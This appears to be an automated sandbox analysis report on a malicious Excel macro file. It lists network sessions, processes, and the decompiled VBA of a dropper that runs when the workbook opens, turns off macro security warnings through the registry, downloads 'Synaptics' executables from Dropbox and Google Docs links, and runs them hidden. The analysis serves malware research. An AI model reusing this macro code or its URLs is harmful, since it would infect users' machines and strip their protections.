                            2024-12-30 10:05:38 UTC1121INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 39 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65
                            Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 409</title><link href="https://cfl.dropboxstatic.com/static/metaserve


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2192.168.2.2449778162.125.66.184436836C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                            TimestampBytes transferredDirectionData
                            2024-12-30 10:05:39 UTC178OUTGET /s/zhp1b06imehwylq/Synaptics.rar?dl=1 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                            Host: www.dropbox.com
                            2024-12-30 10:05:39 UTC825INHTTP/1.1 409 Conflict
                            Content-Security-Policy: script-src 'none'
                            Content-Security-Policy: sandbox
                            Pragma: no-cache
                            Referrer-Policy: strict-origin-when-cross-origin
                            Set-Cookie: gvc=ODU1ODUwNDE5MDAzNjc1Njk4MjMzMDg4Nzc5MjMwMjUxMDI4MTQ=; Path=/; Expires=Sat, 29 Dec 2029 10:05:39 GMT; HttpOnly; Secure; SameSite=None
                            X-Content-Type-Options: nosniff
                            X-Permitted-Cross-Domain-Policies: none
                            X-Robots-Tag: noindex, nofollow, noimageindex
                            X-Xss-Protection: 1; mode=block
                            Content-Type: text/html; charset=utf-8
                            Content-Length: 1121
                            Date: Mon, 30 Dec 2024 10:05:39 GMT
                            Strict-Transport-Security: max-age=31536000; includeSubDomains
                            Server: envoy
                            Cache-Control: no-cache, no-store
                            Vary: Accept-Encoding
                            X-Dropbox-Response-Origin: far_remote
                            X-Dropbox-Request-Id: f2eb9956958d477c8d1551e0e74c84e7
                            Connection: close
                            2024-12-30 10:05:39 UTC1121INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 39 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65
                            Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 409</title><link href="https://cfl.dropboxstatic.com/static/metaserve


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            3192.168.2.2449799142.250.184.2064437948C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                            TimestampBytes transferredDirectionData
                            2024-12-30 10:06:47 UTC192OUTGET /uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                            Host: docs.google.com
                            2024-12-30 10:06:47 UTC1223INHTTP/1.1 404 Not Found
                            Content-Type: text/html; charset=utf-8
                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                            Pragma: no-cache
                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                            Date: Mon, 30 Dec 2024 10:06:47 GMT
                            Strict-Transport-Security: max-age=31536000
                            Cross-Origin-Opener-Policy: same-origin
                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                            Content-Security-Policy: script-src 'nonce-sOz_rOskb48vPZBYrePENw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                            Server: ESF
                            X-XSS-Protection: 0
                            X-Content-Type-Options: nosniff
                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                            Accept-Ranges: none
                            Vary: Accept-Encoding
                            Connection: close
                            Transfer-Encoding: chunked
                            2024-12-30 10:06:47 UTC167INData Raw: 36 37 34 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69
                            Data Ascii: 674<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</ti
                            2024-12-30 10:06:47 UTC1390INData Raw: 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 50 34 54 56 69 77 75 45 44 78 73 51 79 59 5a 53 72 76 6a 66 4a 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 3b 7d 2a
                            Data Ascii: tle><style nonce="P4TViwuEDxsQyYZSrvjfJQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}*
                            2024-12-30 10:06:47 UTC102INData Raw: 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                            Data Ascii: ror.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                            2024-12-30 10:06:47 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            4192.168.2.2449801162.125.66.184437948C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                            TimestampBytes transferredDirectionData
                            2024-12-30 10:06:48 UTC178OUTGET /s/zhp1b06imehwylq/Synaptics.rar?dl=1 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                            Host: www.dropbox.com
                            2024-12-30 10:06:48 UTC825INHTTP/1.1 409 Conflict
                            Content-Security-Policy: script-src 'none'
                            Content-Security-Policy: sandbox
                            Pragma: no-cache
                            Referrer-Policy: strict-origin-when-cross-origin
                            Set-Cookie: gvc=MTU5MTQzMzg2MTI3MjM3OTYzODQ3ODI3MDI2NjY1MTY3NDkyMjI3; Path=/; Expires=Sat, 29 Dec 2029 10:06:48 GMT; HttpOnly; Secure; SameSite=None
                            X-Content-Type-Options: nosniff
                            X-Permitted-Cross-Domain-Policies: none
                            X-Robots-Tag: noindex, nofollow, noimageindex
                            X-Xss-Protection: 1; mode=block
                            Content-Type: text/html; charset=utf-8
                            Content-Length: 1121
                            Date: Mon, 30 Dec 2024 10:06:48 GMT
                            Strict-Transport-Security: max-age=31536000; includeSubDomains
                            Server: envoy
                            Cache-Control: no-cache, no-store
                            Vary: Accept-Encoding
                            X-Dropbox-Response-Origin: far_remote
                            X-Dropbox-Request-Id: 543918c7019845cab94caf1c03055561
                            Connection: close
                            2024-12-30 10:06:48 UTC1121INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 39 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65
                            Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 409</title><link href="https://cfl.dropboxstatic.com/static/metaserve


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            5192.168.2.2449802162.125.66.184437948C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                            TimestampBytes transferredDirectionData
                            2024-12-30 10:06:49 UTC178OUTGET /s/zhp1b06imehwylq/Synaptics.rar?dl=1 HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                            Host: www.dropbox.com
                            2024-12-30 10:06:49 UTC825INHTTP/1.1 409 Conflict
                            Content-Security-Policy: script-src 'none'
                            Content-Security-Policy: sandbox
                            Pragma: no-cache
                            Referrer-Policy: strict-origin-when-cross-origin
                            Set-Cookie: gvc=NTc4NTAwMDM3NDkyNjE3MjA5Nzk3MjMxMjc0MTk2MDM0NTk4ODE=; Path=/; Expires=Sat, 29 Dec 2029 10:06:49 GMT; HttpOnly; Secure; SameSite=None
                            X-Content-Type-Options: nosniff
                            X-Permitted-Cross-Domain-Policies: none
                            X-Robots-Tag: noindex, nofollow, noimageindex
                            X-Xss-Protection: 1; mode=block
                            Content-Type: text/html; charset=utf-8
                            Content-Length: 1121
                            Date: Mon, 30 Dec 2024 10:06:49 GMT
                            Strict-Transport-Security: max-age=31536000; includeSubDomains
                            Server: envoy
                            Cache-Control: no-cache, no-store
                            Vary: Accept-Encoding
                            X-Dropbox-Response-Origin: far_remote
                            X-Dropbox-Request-Id: e7a13b5013474ff6af5955af99393a0d
                            Connection: close
                            2024-12-30 10:06:49 UTC1121INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 39 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65
                            Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 409</title><link href="https://cfl.dropboxstatic.com/static/metaserve


                            Click to jump to process

                            Click to jump to process

                            Click to dive into process behavior distribution

                            Click to jump to process

                            Target ID:0
                            Start time:05:05:32
                            Start date:30/12/2024
                            Path:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                            Wow64 process (32bit):false
                            Commandline:"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                            Imagebase:0x7ff7a90e0000
                            File size:70'082'712 bytes
                            MD5 hash:F9F7B6C42211B06E7AC3E4B60AA8FB77
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:false

                            Target ID:14
                            Start time:05:06:34
                            Start date:30/12/2024
                            Path:C:\Windows\splwow64.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\splwow64.exe 12288
                            Imagebase:0x7ff682190000
                            File size:192'512 bytes
                            MD5 hash:AF4A7EBF6114EE9E6FBCC910EC3C96E6
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:false

                            Target ID:16
                            Start time:05:06:43
                            Start date:30/12/2024
                            Path:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                            Wow64 process (32bit):false
                            Commandline:"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\universityform.xlsm"
                            Imagebase:0x7ff7a90e0000
                            File size:70'082'712 bytes
                            MD5 hash:F9F7B6C42211B06E7AC3E4B60AA8FB77
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            Call Graph

                            Module: ThisWorkbook

                            Declaration
                            LineContent
                            1

                            Attribute VB_Name = "ThisWorkbook"

                            2

                            Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                            3

                            Attribute VB_GlobalNameSpace = False

                            4

                            Attribute VB_Creatable = False

                            5

                            Attribute VB_PredeclaredId = True

                            6

                            Attribute VB_Exposed = True

                            7

                            Attribute VB_TemplateDerived = False

                            8

                            Attribute VB_Customizable = True

                            9

                            Dim SheetsChanged as Boolean

                            10

                            Dim SheetCount as Integer

                            APIsMeta Information

                            CreateObject

                            CreateObject("scripting.filesystemobject")

                            Path

                            ActiveWorkbook

                            Path

                            ActiveWorkbook

                            Environ

                            Environ("Temp") -> C:\Users\Maoga\AppData\Local\Temp

                            FileExists

                            FileExists

                            FileCopy

                            Shell

                            vbHide

                            FileExists

                            FileExists

                            FileCopy

                            Shell

                            vbHide

                            FileExists

                            Environ

                            Environ("ALLUSERSPROFILE") -> C:\ProgramData

                            Shell

                            Environ

                            vbHide

                            FileExists

                            Environ

                            Environ("WINDIR") -> C:\Windows

                            Shell

                            Environ

                            vbHide

                            FileExists

                            Part of subcall function FDW@ThisWorkbook: CreateObject

                            Part of subcall function FDW@ThisWorkbook: CreateObject

                            Part of subcall function FDW@ThisWorkbook: Option

                            Part of subcall function FDW@ThisWorkbook: Option

                            Part of subcall function FDW@ThisWorkbook: AllowRedirects

                            Part of subcall function FDW@ThisWorkbook: Open

                            Part of subcall function FDW@ThisWorkbook: Send

                            Part of subcall function FDW@ThisWorkbook: Status

                            Part of subcall function FDW@ThisWorkbook: InStr

                            Part of subcall function FDW@ThisWorkbook: ResponseText

                            Part of subcall function FDW@ThisWorkbook: CreateObject

                            Part of subcall function FDW@ThisWorkbook: Open

                            Part of subcall function FDW@ThisWorkbook: Type

                            Part of subcall function FDW@ThisWorkbook: Write

                            Part of subcall function FDW@ThisWorkbook: ResponseBody

                            Part of subcall function FDW@ThisWorkbook: SaveToFile

                            Part of subcall function FDW@ThisWorkbook: Close

                            Part of subcall function FDW@ThisWorkbook: CreateObject

                            Part of subcall function FDW@ThisWorkbook: CreateObject

                            Part of subcall function FDW@ThisWorkbook: Option

                            Part of subcall function FDW@ThisWorkbook: Option

                            Part of subcall function FDW@ThisWorkbook: AllowRedirects

                            Part of subcall function FDW@ThisWorkbook: Open

                            Part of subcall function FDW@ThisWorkbook: Send

                            Part of subcall function FDW@ThisWorkbook: Status

                            Part of subcall function FDW@ThisWorkbook: InStr

                            Part of subcall function FDW@ThisWorkbook: ResponseText

                            Part of subcall function FDW@ThisWorkbook: CreateObject

                            Part of subcall function FDW@ThisWorkbook: Open

                            Part of subcall function FDW@ThisWorkbook: Type

                            Part of subcall function FDW@ThisWorkbook: Write

                            Part of subcall function FDW@ThisWorkbook: ResponseBody

                            Part of subcall function FDW@ThisWorkbook: SaveToFile

                            Part of subcall function FDW@ThisWorkbook: Close

                            Part of subcall function FDW@ThisWorkbook: CreateObject

                            Part of subcall function FDW@ThisWorkbook: CreateObject

                            Part of subcall function FDW@ThisWorkbook: Option

                            Part of subcall function FDW@ThisWorkbook: Option

                            Part of subcall function FDW@ThisWorkbook: AllowRedirects

                            Part of subcall function FDW@ThisWorkbook: Open

                            Part of subcall function FDW@ThisWorkbook: Send

                            Part of subcall function FDW@ThisWorkbook: Status

                            Part of subcall function FDW@ThisWorkbook: InStr

                            Part of subcall function FDW@ThisWorkbook: ResponseText

                            Part of subcall function FDW@ThisWorkbook: CreateObject

                            Part of subcall function FDW@ThisWorkbook: Open

                            Part of subcall function FDW@ThisWorkbook: Type

                            Part of subcall function FDW@ThisWorkbook: Write

                            Part of subcall function FDW@ThisWorkbook: ResponseBody

                            Part of subcall function FDW@ThisWorkbook: SaveToFile

                            Part of subcall function FDW@ThisWorkbook: Close

                            FileExists

                            Shell

                            vbHide

                            Shell

                            vbHide

                            StringsDecrypted Strings
                            "scripting.filesystemobject"
                            "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download"
                            "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"
                            "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"
                            "Temp"
                            "ALLUSERSPROFILE"
                            "ALLUSERSPROFILE"
                            "WINDIR"
                            "WINDIR"
                            LineInstructionMeta Information
                            147

                            Sub MPS()

                            148

                            Dim FSO as Object

                            executed
                            149

                            Dim FP(1 To 3), TMP, URL(1 To 3) as String

                            151

                            Set FSO = CreateObject("scripting.filesystemobject")

                            CreateObject("scripting.filesystemobject")

                            executed
                            152

                            FP(1) = ActiveWorkbook.Path & "\~$cache1"

                            Path

                            ActiveWorkbook

                            153

                            FP(2) = ActiveWorkbook.Path & "\Synaptics.exe"

                            Path

                            ActiveWorkbook

                            155

                            URL(1) = "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download"

                            156

                            URL(2) = "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"

                            157

                            URL(3) = "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1"

                            158

                            TMP = Environ("Temp") & "\~$cache1.exe"

                            Environ("Temp") -> C:\Users\Maoga\AppData\Local\Temp

                            executed
                            160

                            If FSO.FileExists(FP(1)) Then

                            FileExists

                            161

                            If Not FSO.FileExists(TMP) Then

                            FileExists

                            162

                            FileCopy FP(1), TMP

                            FileCopy

                            163

                            Endif

                            164

                            Shell TMP, vbHide

                            Shell

                            vbHide

                            165

                            Elseif FSO.FileExists(FP(2)) Then

                            FileExists

                            166

                            If Not FSO.FileExists(TMP) Then

                            FileExists

                            167

                            FileCopy FP(2), TMP

                            FileCopy

                            168

                            Endif

                            169

                            Shell TMP, vbHide

                            Shell

                            vbHide

                            170

                            Else

                            171

                            If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then

                            FileExists

                            Environ("ALLUSERSPROFILE") -> C:\ProgramData

                            executed
                            172

                            Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide

                            Shell

                            Environ

                            vbHide

                            173

                            Elseif FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then

                            FileExists

                            Environ("WINDIR") -> C:\Windows

                            executed
                            174

                            Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide

                            Shell

                            Environ

                            vbHide

                            175

                            Elseif Not FSO.FileExists(TMP) Then

                            FileExists

                            176

                            If FDW((URL(1)), (TMP)) Then

                            177

                            Elseif FDW((URL(2)), (TMP)) Then

                            178

                            Elseif FDW((URL(3)), (TMP)) Then

                            179

                            Endif

                            180

                            If FSO.FileExists(TMP) Then

                            FileExists

                            181

                            Shell TMP, vbHide

                            Shell

                            vbHide

                            182

                            Endif

                            183

                            Else

                            184

                            Shell TMP, vbHide

                            Shell

                            vbHide

                            185

                            Endif

                            187

                            Endif

                            189

                            End Sub

                            APIsMeta Information

                            Sheets

                            Sheets

                            xlSheetVisible

                            Part of subcall function RegKeySave@ThisWorkbook: CreateObject

                            Part of subcall function RegKeySave@ThisWorkbook: RegWrite

                            Version

                            Part of subcall function RegKeySave@ThisWorkbook: CreateObject

                            Part of subcall function RegKeySave@ThisWorkbook: RegWrite

                            Version

                            DisplayAlerts

                            Count

                            Worksheets

                            Part of subcall function MPS@ThisWorkbook: CreateObject

                            Part of subcall function MPS@ThisWorkbook: Path

                            Part of subcall function MPS@ThisWorkbook: ActiveWorkbook

                            Part of subcall function MPS@ThisWorkbook: Path

                            Part of subcall function MPS@ThisWorkbook: ActiveWorkbook

                            Part of subcall function MPS@ThisWorkbook: Environ

                            Part of subcall function MPS@ThisWorkbook: FileExists

                            Part of subcall function MPS@ThisWorkbook: FileExists

                            Part of subcall function MPS@ThisWorkbook: FileCopy

                            Part of subcall function MPS@ThisWorkbook: Shell

                            Part of subcall function MPS@ThisWorkbook: vbHide

                            Part of subcall function MPS@ThisWorkbook: FileExists

                            Part of subcall function MPS@ThisWorkbook: FileExists

                            Part of subcall function MPS@ThisWorkbook: FileCopy

                            Part of subcall function MPS@ThisWorkbook: Shell

                            Part of subcall function MPS@ThisWorkbook: vbHide

                            Part of subcall function MPS@ThisWorkbook: FileExists

                            Part of subcall function MPS@ThisWorkbook: Environ

                            Part of subcall function MPS@ThisWorkbook: Shell

                            Part of subcall function MPS@ThisWorkbook: Environ

                            Part of subcall function MPS@ThisWorkbook: vbHide

                            Part of subcall function MPS@ThisWorkbook: FileExists

                            Part of subcall function MPS@ThisWorkbook: Environ

                            Part of subcall function MPS@ThisWorkbook: Shell

                            Part of subcall function MPS@ThisWorkbook: Environ

                            Part of subcall function MPS@ThisWorkbook: vbHide

                            Part of subcall function MPS@ThisWorkbook: FileExists

                            Part of subcall function MPS@ThisWorkbook: FileExists

                            Part of subcall function MPS@ThisWorkbook: Shell

                            Part of subcall function MPS@ThisWorkbook: vbHide

                            Part of subcall function MPS@ThisWorkbook: Shell

                            Part of subcall function MPS@ThisWorkbook: vbHide

                            Select

                            StringsDecrypted Strings
                            "HKCU\Software\Microsoft\Office\"
                            "REG_DWORD"
                            "HKCU\Software\Microsoft\Office\"
                            "REG_DWORD"
                            LineInstructionMeta Information
                            12

                            Private Sub Workbook_Open()

                            13

                            Dim i as Integer

                            executed
                            14

                            For i = 1 To ActiveWorkbook.Sheets.Count

                            Sheets

                            15

                            ActiveWorkbook.Sheets(i).Visible = xlSheetVisible

                            Sheets

                            xlSheetVisible

                            16

                            Next i

                            Sheets

                            18

                            RegKeySave "HKCU\Software\Microsoft\Office\" & Application.Version & "\Excel\Security\VBAWarnings", 1, "REG_DWORD"

                            Version

                            19

                            RegKeySave "HKCU\Software\Microsoft\Office\" & Application.Version & "\Word\Security\VBAWarnings", 1, "REG_DWORD"

                            Version

                            21

                            Application.DisplayAlerts = False

                            DisplayAlerts

                            22

                            SheetCount = Worksheets.Count

                            Count

                            Worksheets

                            24

                            Call MPS()

                            26

                            ActiveWorkbook.Sheets(1).Select

                            Select

                            27

                            SheetsChanged = False

                            28

                            End Sub

                            APIsMeta Information

                            CreateObject

                            CreateObject("WinHttp.WinHttpRequest.5.1")

                            CreateObject

                            Option

                            Option

                            AllowRedirects

                            Open

                            WinHttpRequest.Open("GET","https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download",False) WinHttpRequest.Open("GET","https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1",False)

                            Send

                            Status

                            WinHttpRequest.Status() -> 404 WinHttpRequest.Status() -> 409

                            InStr

                            ResponseText

                            CreateObject

                            Open

                            Type

                            Write

                            ResponseBody

                            SaveToFile

                            Close

                            StringsDecrypted Strings
                            "WinHttp.WinHttpRequest.5.1"
                            "WinHttp.WinHttpRequest.5"
                            "WinHttp.WinHttpRequest.5"
                            "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
                            "GET"
                            "404 Not Found"
                            ">Not Found<"
                            "ADODB.Stream"
                            "Dropbox - Error"
                            "404 Not Found"
                            ">Not Found<"
                            "ADODB.Stream"
                            "Dropbox - Error"
                            "ADODB.Stream"
                            LineInstructionMeta Information
                            191

                            Function FDW(MYU, NMA as String) as Boolean

                            192

                            Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")

                            CreateObject("WinHttp.WinHttpRequest.5.1")

                            executed
                            193

                            If WinHttpReq Is Nothing Then

                            194

                            Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")

                            CreateObject

                            195

                            Endif

                            197

                            WinHttpReq.Option(0) = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"

                            Option

                            198

                            WinHttpReq.Option(6) = AllowRedirects

                            Option

                            AllowRedirects

                            199

                            WinHttpReq.Open "GET", MYU, False

                            WinHttpRequest.Open("GET","https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download",False)

                            executed
                            200

                            WinHttpReq.Send

                            Send

                            202

                            If (WinHttpReq.Status = 200) Then

                            WinHttpRequest.Status() -> 404

                            executed
                            203

                            If (InStr(WinHttpReq.ResponseText, "404 Not Found") = 0) And (InStr(WinHttpReq.ResponseText, ">Not Found<") = 0) And (InStr(WinHttpReq.ResponseText, "Dropbox - Error") = 0) Then

                            InStr

                            ResponseText

                            204

                            FDW = True

                            205

                            Set oStream = CreateObject("ADODB.Stream")

